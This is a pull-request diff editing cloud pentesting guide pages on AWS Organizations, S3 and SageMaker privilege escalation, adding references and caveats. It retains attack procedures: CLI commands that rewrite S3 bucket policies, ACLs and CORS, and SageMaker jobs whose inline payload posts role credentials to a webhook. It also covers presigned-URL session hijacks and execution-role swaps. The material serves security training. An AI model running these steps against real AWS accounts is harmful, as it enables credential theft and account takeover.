### PR TITLE
Normalize cloud references batch 008

### DIFF
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Organizations Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Organizations
 
 For more information check:
@@ -12,11 +10,13 @@ For more information check:
 
 ## From management Account to children accounts
 
-If you compromise the root/management account, chances are you can compromise all the children accounts.\
+If you compromise the AWS Organizations management account, you may be able to access member accounts created through Organizations: AWS automatically creates `OrganizationAccountAccessRole` in each such account, granting management-account users and roles full administrative control, subject to applicable service control policies. The role name is customizable, and the access path still requires a principal in the management account with permission to assume the role.<sup>[[1]](#references)[[2]](#references)</sup>\
 To [**learn how check this page**](../../index.html#compromising-the-organization).
 
+## References
+
+- [1] [Creating a member account in an organization with AWS Organizations](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts_create.html)
+- [2] [Accessing a member account that has OrganizationAccountAccessRole with AWS Organizations](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts_access-cross-account-role.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc/README.md
@@ -1,14 +1,12 @@
 # AWS - S3 Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## S3
 
 ### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject`
 
-An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges.
+An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges.<sup>[[1]](#references)</sup>
 
-For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy:
+For example, an attacker with those **permissions over a CloudFormation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy:<sup>[[1]](#references)</sup>
 
 ```json
 {
@@ -36,30 +34,30 @@ For example, an attacker with those **permissions over a cloudformation bucket**
 }
 ```
 
-And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**.
+The hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might create a **Lambda function** in their account that will **trigger when a bucket notification is sent**, and **hijack** the **content** of that **bucket**.<sup>[[1]](#references)</sup>
 
 ![CloudFormation template bucket hijack diagram using an attacker-controlled Lambda to modify the uploaded template](<../../../images/image (174).png>)
 
-The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\
-For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/)
+The Pacu module [`cfn__resource_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.<sup>[[2]](#references)</sup>\
+For more information, check the original research: [Cloud Malware: Resource Injection in CloudFormation Templates](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/).<sup>[[1]](#references)</sup>
 
 ### `s3:PutObject`, `s3:GetObject` <a href="#s3putobject-s3getobject" id="s3putobject-s3getobject"></a>
 
-These are the permissions to **get and upload objects to S3**. Several services inside AWS (and outside of it) use S3 storage to store **config files**.\
+These are the permissions to **get and upload objects to S3**.<sup>[[3]](#references)</sup> Several services inside AWS (and outside of it) use S3 storage to store **config files**.\
 An attacker with **read access** to them might find **sensitive information** on them.\
 An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\
 These are some examples:
 
-- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**.
+- If an EC2 instance is configured to retrieve its **user data from an S3 bucket**, an attacker could replace that object and **execute arbitrary code inside the EC2 instance** when the user-data script runs. This depends on the instance bootstrap process retrieving the object and on user-data execution occurring after the replacement.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ### `s3:PutObject`, `s3:GetObject` (optional) over terraform state file
 
-It is very common that the [terraform](https://cloud.hacktricks.wiki/en/pentesting-ci-cd/terraform-security.html) state files are being saved to blob storage of cloud providers, e.g. AWS S3. The file suffix for a state file is `.tfstate`, and the bucket names often also give away that they contain terraform state files. Usually, every AWS account has one such bucket to store the state files that show the state of the account.
-Also usually, in real world accounts almost always all developers have `s3:*` and sometimes even business users have `s3:Put*`.
+It is very common for [Terraform](https://cloud.hacktricks.wiki/en/pentesting-ci-cd/terraform-security.html) state files to be saved to cloud blob storage, such as AWS S3. HashiCorp's S3 backend stores state at a configured object key and requires `s3:GetObject` and `s3:PutObject`.<sup>[[5]](#references)</sup> State keys are commonly given a `.tfstate` suffix, and bucket names often reveal that they contain Terraform state.
+In real-world accounts, developers may have broad S3 permissions such as `s3:*`, and some business users may have `s3:Put*`.
 
-So, if you have the permissions listed over these files, there is an attack vector that allows you to gain RCE in the pipeline with the privileges of `terraform` - most of the time `AdministratorAccess`, making you the admin of the cloud account. Also, you can use that vector to do a denial of service attack by making `terraform` delete legitimate resources.
+If you have the permissions listed over these files, there is an attack vector that can provide code execution in the pipeline with Terraform's privileges. The impact depends on the pipeline role; when it has `AdministratorAccess`, this can amount to account-wide administrative impact. The same vector can cause denial of service by making Terraform delete legitimate resources.<sup>[[6]](#references)</sup>
 
-Follow the description in the *Abusing Terraform State Files* section of the *Terraform Security* page for directly usable exploit code:
+Follow the description in the *Abusing Terraform State Files* section of the *Terraform Security* page for directly usable exploit code:<sup>[[6]](#references)</sup>
 
 {{#ref}}
 ../../../../pentesting-ci-cd/terraform-security.md#abusing-terraform-state-files
@@ -67,7 +65,7 @@ Follow the description in the *Abusing Terraform State Files* section of the *Te
 
 ### `s3:PutBucketPolicy`
 
-An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets.
+An identity using `s3:PutBucketPolicy` must belong to the bucket owner's account; otherwise, even with the permission, S3 returns `405 Method Not Allowed`. In the bucket owner's account, this permission can be abused to replace a bucket policy and grant the caller broader access, subject to other policy controls.<sup>[[7]](#references)</sup>
 
 ```bash
 # Update Bucket policy
@@ -125,10 +123,11 @@ aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-n
 }
 ```
 
+S3 Block Public Access can reject a `PutBucketPolicy` request when the policy allows public access, even if the caller has `s3:PutBucketPolicy`.<sup>[[8]](#references)</sup>
+
 ### `s3:GetBucketAcl`, `s3:PutBucketAcl`
 
-An attacker could abuse these permissions to **grant him more access** over specific buckets.\
-Note that the attacker doesn't need to be from the same account. Moreover the write access
+An attacker could abuse these permissions to **grant themselves more access** over specific buckets.<sup>[[9]](#references)</sup> The attacker does not need to be from the same account if the required cross-account permissions are granted. Writing a bucket ACL requires `WRITE_ACP`.<sup>[[9]](#references)</sup>
 
 ```bash
 # Update bucket ACL
@@ -155,9 +154,11 @@ aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://a
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
 
+These ACL examples apply only when ACLs are enabled. Buckets using S3 Object Ownership's `Bucket owner enforced` setting reject ACL writes, and S3 Block Public Access can reject ACLs that grant public access. The `AuthenticatedUsers` group grants access to every authenticated AWS account rather than to one specific attacker.<sup>[[8]](#references)[[9]](#references)</sup>
+
 ### `s3:GetObjectAcl`, `s3:PutObjectAcl`
 
-An attacker could abuse these permissions to grant him more access over specific objects inside buckets.
+An attacker could abuse these permissions to grant themselves more access over specific objects inside buckets.<sup>[[9]](#references)</sup>
 
 ```bash
 # Update bucket object ACL
@@ -184,20 +185,20 @@ aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-poli
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
 
-### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl`
+### `s3:GetObjectVersionAcl`, `s3:PutObjectVersionAcl`
 
-An attacker with these privileges is expected to be able to put an Acl to an specific object version
+An attacker with these privileges can set an ACL on a specific object version.<sup>[[3]](#references)</sup>
 
 ```bash
-aws s3api get-object-acl --bucket <bucekt-name> --key flag
+aws s3api get-object-acl --bucket <bucket-name> --key flag --version-id <value>
 aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
 ```
 
 ### `s3:PutBucketCORS`
 
-An attacker with the s3:PutBucketCORS permission can modify a bucket's CORS (Cross-Origin Resource Sharing) configuration, which controls which web domains may access its endpoints. If they set a permissive policy, any website could make direct requests to the bucket and read responses from a browser.
+An attacker with the `s3:PutBucketCORS` permission can replace a bucket's CORS (Cross-Origin Resource Sharing) configuration, which controls which browser origins, methods, and headers S3 allows for cross-origin requests.<sup>[[10]](#references)[[11]](#references)</sup> CORS does not bypass the bucket's IAM policies or ACLs.<sup>[[11]](#references)</sup>
 
-This means that, potentially, if an authenticated user for a web app hosted from the bucket visits the attacker's website, the attacker could exploit the permissive CORS policy and, depending on the application, access the user's profile data or even hijack the user's account.
+If a web application relies on browser-accessible credentials or otherwise authorizes the browser to access profile data, an attacker-controlled website may be able to issue or read cross-origin requests when the CORS rule is overly permissive. The impact depends on the application's authentication and authorization controls; CORS alone does not grant access to protected S3 objects.<sup>[[11]](#references)</sup>
 
 ```bash
 aws s3api put-bucket-cors \
@@ -214,5 +215,19 @@ aws s3api put-bucket-cors \
     ]
   }'
 ```
+
+## References
+
+- [1] [Cloud Malware: Resource Injection in CloudFormation Templates](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/)
+- [2] [Pacu Module Details](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection)
+- [3] [Required permissions for Amazon S3 API operations](https://docs.aws.amazon.com/AmazonS3/latest/userguide/using-with-s3-policy-actions.html)
+- [4] [Run commands when you launch an EC2 instance with user data input](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html)
+- [5] [Backend Type: s3](https://developer.hashicorp.com/terraform/language/backend/s3)
+- [6] [Hacking Terraform State for Privilege Escalation](https://www.plerion.com/blog/hacking-terraform-state-for-privilege-escalation)
+- [7] [put-bucket-policy — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-policy.html)
+- [8] [Blocking public access to your Amazon S3 storage](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html)
+- [9] [Access control list (ACL) overview](https://docs.aws.amazon.com/AmazonS3/latest/userguide/acl-overview.html)
+- [10] [PutBucketCors — Amazon S3 API Reference](https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketCors.html)
+- [11] [Using cross-origin resource sharing (CORS)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/cors.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc/README.md
@@ -1,12 +1,8 @@
-# AWS - Sagemaker Privesc
-
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## AWS - Sagemaker Privesc
 
 ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
 
-Start creating a noteboook with the IAM Role to access attached to it:
+Start by creating a notebook instance with the target IAM role attached.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```bash
 aws sagemaker create-notebook-instance --notebook-instance-name example \
@@ -14,42 +10,43 @@ aws sagemaker create-notebook-instance --notebook-instance-name example \
     --role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
 ```
 
-The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready:
+The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 aws sagemaker create-presigned-notebook-instance-url \
     --notebook-instance-name <name>
 ```
 
-Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button.
+Open the URL in a browser, click `Open JupyterLab` in the top-right corner, and start a terminal from the "Other" section of the Launcher tab.<sup>[[1]](#references)</sup>
 
-Now It's possible to access the metadata credentials of the IAM Role.
+The terminal can then access the temporary credentials of the attached IAM role.<sup>[[1]](#references)</sup>
 
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potential Impact:** Privesc to the sagemaker service role specified.<sup>[[1]](#references)</sup>
 
 ### `sagemaker:CreatePresignedNotebookInstanceUrl`
 
-If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**.
+If a Jupyter notebook instance is already running and can be listed with `sagemaker:ListNotebookInstances` (or discovered another way), an attacker can generate a URL, access it, and retrieve the attached role's credentials as described above.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ```bash
 aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>
 ```
 
-**Potential Impact:** Privesc to the sagemaker service role attached.
+**Potential Impact:** Privesc to the sagemaker service role attached.<sup>[[1]](#references)</sup>
 
 
 ## `sagemaker:CreatePresignedDomainUrl`
 
 > [!WARNING]
-> This attack only works on old traditional SageMaker Studio domains, not those created by SageMaker Unified Studio. Domains from Unified Studio will return the error: "This SageMaker AI Domain was created by SageMaker Unified Studio and must be accessed via SageMaker Unified Studio Portal".
+> This attack targets traditional SageMaker Studio domains that use the SageMaker AI `CreatePresignedDomainUrl` flow, not domains created by SageMaker Unified Studio. Unified Studio domains use the Unified Studio portal instead.<sup>[[5]](#references)[[23]](#references)</sup>
+> Domains from Unified Studio may return the error: "This SageMaker AI Domain was created by SageMaker Unified Studio and must be accessed via SageMaker Unified Studio Portal".
 
-An identity with permission to call `sagemaker:CreatePresignedDomainUrl` on a target Studio `UserProfile` can mint a login URL that authenticates directly into SageMaker Studio as that profile. This grants the attacker's browser a Studio session that inherits the profile's `ExecutionRole` permissions and full access to the profile's EFS-backed home and apps. No `iam:PassRole` or console access is required.
+An identity with permission to call `sagemaker:CreatePresignedDomainUrl` on a target Studio `UserProfile` can mint a login URL that authenticates directly into SageMaker Studio as that profile. This grants the attacker's browser a Studio session that inherits the profile's `ExecutionRole` permissions and full access to the profile's EFS-backed home and apps. No `iam:PassRole` or console access is required.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 **Requirements**:
-- A SageMaker Studio `Domain` and a target `UserProfile` within it.
-- The attacker principal needs `sagemaker:CreatePresignedDomainUrl` on the target `UserProfile` (resource‑level) or `*`.
+- A SageMaker Studio `Domain` and a target `UserProfile` within it.<sup>[[7]](#references)</sup>
+- The attacker principal needs `sagemaker:CreatePresignedDomainUrl` on the target `UserProfile` (resource‑level) or `*`.<sup>[[6]](#references)</sup>
 
-Minimal policy example (scoped to one UserProfile):
+Minimal policy example (scoped to one UserProfile).<sup>[[6]](#references)</sup>
 
 ```json
 {
@@ -73,13 +70,13 @@ aws sagemaker list-user-profiles --domain-id-equals $DOM
 TARGET_USER=<UserProfileName>
 ```
 
-2) Check if unified studio is not being used (attack only works on traditional SageMaker Studio domains)
+2) Check if unified studio is not being used (attack only works on traditional SageMaker Studio domains)<sup>[[5]](#references)[[23]](#references)</sup>
 ```bash
 aws sagemaker describe-domain --domain-id <DOMAIN_ID> --query 'DomainSettings'
 # If you get info about unified studio, this attack won't work
 ```
 
-3) Generate a presigned URL (valid ~5 minutes by default)
+3) Generate a presigned URL (valid ~5 minutes by default)<sup>[[5]](#references)</sup>
 ```bash
 aws sagemaker create-presigned-domain-url \
   --domain-id $DOM \
@@ -87,50 +84,51 @@ aws sagemaker create-presigned-domain-url \
   --query AuthorizedUrl --output text
 ```
 
-4) Open the returned URL in a browser to sign into Studio as the target user. In a Jupyter terminal inside Studio verify the effective identity or exfiltrate the token:
+4) Open the returned URL in a browser to sign into Studio as the target user. In a Jupyter terminal inside Studio verify the effective identity or exfiltrate the token.<sup>[[5]](#references)[[8]](#references)</sup>
 ```bash
 aws sts get-caller-identity
 ```
 
 Notes:
-- `--landing-uri` can be omitted. Some values (e.g., `app:JupyterLab:/lab`) may be rejected depending on Studio flavor/version; defaults typically redirect to the Studio home and then to Jupyter.
-- Org policies/VPC endpoint restrictions may still block network access; the token minting does not require console sign‑in or `iam:PassRole`.
+- `--landing-uri` can be omitted. Some values (e.g., `app:JupyterLab:/lab`) may be rejected depending on Studio flavor/version; defaults typically redirect to the Studio home and then to Jupyter.<sup>[[5]](#references)</sup>
+- Org policies/VPC endpoint restrictions may still block network access.
+- The token minting does not require console sign‑in or `iam:PassRole`.<sup>[[5]](#references)[[6]](#references)</sup>
 
-**Potential Impact**: Lateral movement and privilege escalation by assuming any Studio `UserProfile` whose ARN is permitted, inheriting its `ExecutionRole` and filesystem/apps.
+**Potential Impact**: Lateral movement and privilege escalation by assuming any Studio `UserProfile` whose ARN is permitted, inheriting its `ExecutionRole` and filesystem/apps.<sup>[[5]](#references)[[7]](#references)[[8]](#references)</sup>
 
 
 ### `sagemaker:CreatePresignedMlflowTrackingServerUrl`, `sagemaker-mlflow:AccessUI`, `sagemaker-mlflow:SearchExperiments`
 
-An identity with permission to call `sagemaker:CreatePresignedMlflowTrackingServerUrl` (and `sagemaker-mlflow:AccessUI`, `sagemaker-mlflow:SearchExperiments` for later access) for a target SageMaker MLflow Tracking Server can mint a single‑use presigned URL that authenticates directly to the managed MLflow UI for that server. This grants the same access a legitimate user would have to the server (view/create experiments and runs, and download/upload artifacts in the server’s S3 artifact store).
+An identity with permission to call `sagemaker:CreatePresignedMlflowTrackingServerUrl` (and `sagemaker-mlflow:AccessUI`, `sagemaker-mlflow:SearchExperiments` for later access) for a target SageMaker MLflow Tracking Server can mint a single‑use presigned URL that authenticates directly to the managed MLflow UI for that server. This grants the same access a legitimate user would have to the server (view/create experiments and runs, and download/upload artifacts in the server’s S3 artifact store).<sup>[[9]](#references)[[10]](#references)[[12]](#references)</sup>
 
 **Requirements:**
-- A SageMaker MLflow Tracking Server in the account/region and its name.
-- The attacker principal needs `sagemaker:CreatePresignedMlflowTrackingServerUrl` on the target MLflow Tracking Server resource (or `*`).
+- A SageMaker MLflow Tracking Server in the account/region and its name.<sup>[[11]](#references)</sup>
+- The attacker principal needs `sagemaker:CreatePresignedMlflowTrackingServerUrl` on the target MLflow Tracking Server resource (or `*`).<sup>[[6]](#references)[[10]](#references)</sup>
 
 **Abuse Steps**:
 
-1) Enumerate MLflow Tracking Servers you can target and pick one name
+1) Enumerate MLflow Tracking Servers you can target and pick one name<sup>[[11]](#references)</sup>
 ```bash
 aws sagemaker list-mlflow-tracking-servers \
   --query 'TrackingServerSummaries[].{Name:TrackingServerName,Status:TrackingServerStatus}'
 TS_NAME=<tracking-server-name>
 ```
 
-2) Generate a presigned MLflow UI URL (valid for a short time)
+2) Generate a presigned MLflow UI URL (valid for a short time)<sup>[[9]](#references)[[12]](#references)</sup>
 ```bash
 aws sagemaker create-presigned-mlflow-tracking-server-url \
   --tracking-server-name "$TS_NAME" \
   --query AuthorizedUrl --output text
 ```
 
-3) Open the returned URL in a browser to access the MLflow UI as an authenticated user for that Tracking Server.
+3) Open the returned URL in a browser to access the MLflow UI as an authenticated user for that Tracking Server.<sup>[[12]](#references)</sup>
 
-**Potential Impact:** Direct access to the managed MLflow UI for the targeted Tracking Server, enabling viewing and modification of experiments/runs and retrieval or upload of artifacts stored in the server’s configured S3 artifact store, within the permissions enforced by the server configuration.
+**Potential Impact:** Direct access to the managed MLflow UI for the targeted Tracking Server, enabling viewing and modification of experiments/runs and retrieval or upload of artifacts stored in the server’s configured S3 artifact store, within the permissions enforced by the server configuration.<sup>[[10]](#references)[[12]](#references)</sup>
 
 
 ### `sagemaker:CreateProcessingJob`, `iam:PassRole`
 
-An attacker with those permissions can make **SageMaker execute a processing job** with a SageMaker role attached to it. By reusing one of the AWS Deep Learning Containers that already incluye Python (y ejecutando el job en la misma región que el URI), puedes lanzar código inline sin construir imágenes propias:
+An attacker with those permissions can make **SageMaker execute a processing job** with a SageMaker role attached to it. By reusing a SageMaker-provided Python container image from the same Region, the attacker can run an inline payload without building a custom image.<sup>[[13]](#references)[[14]](#references)[[15]](#references)[[6]](#references)</sup>
 
 ```bash
 REGION=<region>
@@ -145,14 +143,16 @@ aws sagemaker create-processing-job \
   --environment "$ENV" \
   --role-arn $ROLE_ARN
 
-# Las credenciales llegan al webhook indicado. Asegúrate de que el rol tenga permisos ECR (AmazonEC2ContainerRegistryReadOnly) para descargar la imagen.
+# Credentials are sent to the configured webhook. The role also needs ECR pull permissions for this image.
 ```
 
-**Potential Impact:** Privesc to the sagemaker service role specified.
+The inline entrypoint reads the container credential endpoint and posts the returned credentials to the configured endpoint; this also requires outbound network access and the role's required image and S3 permissions.<sup>[[13]](#references)[[15]](#references)</sup>
+
+**Potential Impact:** Privesc to the sagemaker service role specified.<sup>[[13]](#references)[[6]](#references)</sup>
 
 ### `sagemaker:CreateTrainingJob`, `iam:PassRole`
 
-An attacker with those permissions can launch a training job that ejecuta código arbitrario con el rol indicado. Usando un contenedor oficial de SageMaker y sobreescribiendo el entrypoint con un payload inline, no necesitas construir imágenes propias:
+An attacker with those permissions can launch a training job that executes arbitrary code with the supplied role. Reusing an official SageMaker container and overriding its entrypoint with an inline payload avoids building a custom image.<sup>[[16]](#references)[[15]](#references)[[6]](#references)</sup>
 
 ```bash
 REGION=<region>
@@ -160,7 +160,7 @@ ROLE_ARN=<sagemaker-role-to-abuse>
 IMAGE=763104351884.dkr.ecr.$REGION.amazonaws.com/pytorch-training:2.1-cpu-py310
 ENV='{"W":"https://example.com/webhook"}'
 OUTPUT_S3=s3://<existing-bucket>/training-output/
-# El rol debe poder leer imágenes de ECR (p.e. AmazonEC2ContainerRegistryReadOnly) y escribir en OUTPUT_S3.
+# The role must be able to pull the ECR image and write to OUTPUT_S3.
 
 aws sagemaker create-training-job \
   --training-job-name privesc-train \
@@ -171,14 +171,16 @@ aws sagemaker create-training-job \
   --stopping-condition '{"MaxRuntimeInSeconds":600}' \
   --environment "$ENV"
 
-# El payload se ejecuta en cuanto el job pasa a InProgress y exfiltra las credenciales del rol.
+# The payload runs after the job enters InProgress and sends the role credentials to the configured endpoint.
 ```
 
-**Potential Impact:** Privesc to the SageMaker service role specified.
+When the job reaches `InProgress`, the inline entrypoint reads the container credential endpoint and posts the credentials to the configured endpoint.<sup>[[15]](#references)[[16]](#references)</sup>
+
+**Potential Impact:** Privesc to the SageMaker service role specified.<sup>[[16]](#references)[[6]](#references)[[15]](#references)</sup>
 
 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
 
-An attacker with those permissions can launch a HyperParameter Tuning Job that runs attacker-controlled code under the supplied role. Script mode requires hosting the payload in S3, but all steps pueden automatizarse desde la CLI:
+An attacker with those permissions can launch a HyperParameter Tuning Job that runs attacker-controlled code under the supplied role. Script mode requires hosting the payload in S3, but the workflow can be automated from the CLI.<sup>[[17]](#references)[[18]](#references)[[16]](#references)[[15]](#references)[[6]](#references)</sup>
 
 ```bash
 REGION=<region>
@@ -240,7 +242,7 @@ IMAGE=763104351884.dkr.ecr.$REGION.amazonaws.com/pytorch-training:2.1-cpu-py310
 CODE_S3=s3://$BUCKET/code/train-code.tar.gz
 TRAIN_INPUT_S3=s3://$BUCKET/input
 OUTPUT_S3=s3://$BUCKET/output
-# El rol necesita permisos ECR y escritura en el bucket.
+# The role needs ECR pull permissions and write access to the output bucket.
 
 cat > /tmp/hpo-definition.json <<EOF
 {
@@ -286,22 +288,22 @@ aws sagemaker create-hyper-parameter-tuning-job \
   --training-job-definition file:///tmp/hpo-definition.json
 ```
 
-Cada entrenamiento lanzado por el proceso imprime la métrica y exfiltra las credenciales del rol indicado.
+Each training run launched by the tuning job emits the metric and sends the supplied role's credentials to the configured endpoint.<sup>[[17]](#references)[[18]](#references)[[15]](#references)</sup>
 
 
 ### `sagemaker:UpdateUserProfile`, `iam:PassRole`, `sagemaker:CreateApp`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`)
 
-With the permission to update a SageMaker Studio User Profile, create an app, a presigned URL to the app and `iam:PassRole`, an attacker can set the `ExecutionRole` to any IAM role that the SageMaker service principal can assume. New Studio apps launched for that profile will run with the swapped role, giving interactive elevated permissions via Jupyter terminals or jobs launched from Studio.
+With the permission to update a SageMaker Studio User Profile, create an app, a presigned URL to the app and `iam:PassRole`, an attacker can set the `ExecutionRole` to any IAM role that the SageMaker service principal can assume. New Studio apps launched for that profile will run with the swapped role, giving interactive elevated permissions via Jupyter terminals or jobs launched from Studio.<sup>[[19]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 > [!WARNING]
 > This attack requires that there are no applications in the profile or the app creation will fail with an error similar to: `An error occurred (ValidationException) when calling the UpdateUserProfile operation: Unable to update UserProfile [arn:aws:sagemaker:us-east-1:947247140022:user-profile/d-fcmlssoalfra/test-user-profile-2] with InService App. Delete all InService apps for UserProfile and try again.`
-> If there is any app you will need `sagemaker:DeleteApp` permission to delete them first.
+> If there is any app you will need `sagemaker:DeleteApp` permission to delete them first.<sup>[[19]](#references)[[20]](#references)</sup>
 
 Steps:
 
 ```bash
 # 1) List Studio domains and pick a target
-aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}' 
+aws sagemaker list-domains --query 'Domains[].{Id:DomainId,Name:DomainName}'
 
 # 2) List Studio user profiles and pick a target
 aws sagemaker list-user-profiles --domain-id-equals <DOMAIN_ID>
@@ -309,7 +311,7 @@ aws sagemaker list-user-profiles --domain-id-equals <DOMAIN_ID>
 # Choose a more-privileged role that already trusts sagemaker.amazonaws.com
 ROLE_ARN=arn:aws:iam::<ACCOUNT_ID>:role/<HighPrivSageMakerExecutionRole>
 
-# 3) Update the Studio profile to use the new role (no iam:PassRole)
+# 3) Update the Studio profile to use the new role (requires iam:PassRole)
 aws sagemaker update-user-profile \
   --domain-id <DOMAIN_ID> \
   --user-profile-name <USER> \
@@ -323,7 +325,7 @@ aws sagemaker describe-user-profile \
 # 3.1) Optional if you need to delete existing apps first
 # List existing apps
 aws sagemaker list-apps \
-  --domain-id-equals <DOMAIN_ID> 
+  --domain-id-equals <DOMAIN_ID>
 
 # Delete an app
 aws sagemaker delete-app \
@@ -332,7 +334,7 @@ aws sagemaker delete-app \
   --app-type JupyterServer \
   --app-name <APP_NAME>
 
-# 4) Create a JupyterServer app for a user profile (will inherit domain default role)
+# 4) Create a JupyterServer app for a user profile (will use the profile execution role)
 aws sagemaker create-app \
   --domain-id <DOMAIN_ID> \
   --user-profile-name <USER> \
@@ -340,7 +342,7 @@ aws sagemaker create-app \
   --app-name <APP_NAME>
 
 
-# 5) Generate a presigned URL to access Studio with the new domain default role
+# 5) Generate a presigned URL to access Studio with the new profile execution role
 aws sagemaker create-presigned-domain-url \
   --domain-id <DOMAIN_ID> \
   --user-profile-name <USER> \
@@ -348,33 +350,45 @@ aws sagemaker create-presigned-domain-url \
 
 # 6) Open the URL in browser, navigate to JupyterLab, open Terminal and verify:
 #    aws sts get-caller-identity
-#    (should show the high-privilege role from domain defaults)
+#    (should show the high-privilege profile execution role)
 
 ```
 
-**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.
+**Potential Impact**: Privilege escalation to the permissions of the specified SageMaker execution role for interactive Studio sessions.<sup>[[19]](#references)[[8]](#references)</sup>
 
 
-### `sagemaker:UpdateDomain`, `sagemaker:CreateApp`, `iam:PassRole`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`)
+### `sagemaker:UpdateDomain`, `sagemaker:CreateUserProfile`, `sagemaker:CreateApp`, `iam:PassRole`, `sagemaker:CreatePresignedDomainUrl`, (`sagemaker:DeleteApp`)
 
-With permissions to update a SageMaker Studio Domain, create an app, a presigned URL to the app, and `iam:PassRole`, an attacker can set the default domain `ExecutionRole` to any IAM role that the SageMaker service principal can assume. New Studio apps launched for that profile will run with the swapped role, giving interactive elevated permissions via Jupyter terminals or jobs launched from Studio.
+With permissions to update a SageMaker Studio Domain, create a user profile and app, generate a presigned URL to the app, and use `iam:PassRole`, an attacker can set the default domain `ExecutionRole` for new profiles to any IAM role that the SageMaker service principal can assume. A profile created after the change without an explicit role override inherits the swapped default, and its new Studio apps can then provide interactive elevated permissions via Jupyter terminals or jobs launched from Studio.<sup>[[21]](#references)[[27]](#references)[[6]](#references)[[8]](#references)</sup>
 
 > [!WARNING]
-> This attack requires that there are no applications in the domain or the app creation will fail with the error: `An error occurred (ValidationException) when calling the UpdateDomain operation: Unable to update Domain [arn:aws:sagemaker:us-east-1:947247140022:domain/d-fcmlssoalfra] with InService App. Delete all InService apps in the domain including shared Apps for [domain-shared] User Profile, and try again.`
